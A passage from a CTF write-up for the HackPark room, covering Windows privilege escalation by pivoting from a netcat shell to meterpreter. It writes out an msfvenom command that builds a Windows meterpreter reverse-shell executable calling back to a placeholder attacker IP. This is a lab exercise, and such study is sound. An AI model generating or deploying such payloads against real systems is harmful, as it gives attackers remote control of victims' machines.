jeffscyberjournal/CTFbin/HackPark.md

 # Task 4 Windows Privilege Escalation

+## Q1 First we will pivot from netcat to a meterpreter session and use this to enumerate the machine to identify potential vulnerabilities.
+We will then use this gathered information to exploit the system and become the Administrator.
+Answer: none required.
+Tip:You can generate the reverse-shell payload using msfvenom, upload it using your current netcat session and execute it manually!

 Here a more stable reverse shell is the goal that from the exploit so a msfvenom meterpreter payload is required for a windows system:
 ```
 msfvenom -p windows/meterpreter/reverse_tcp LHOST=[YOUR_IP] LPORT=4444 -f exe > shell.exe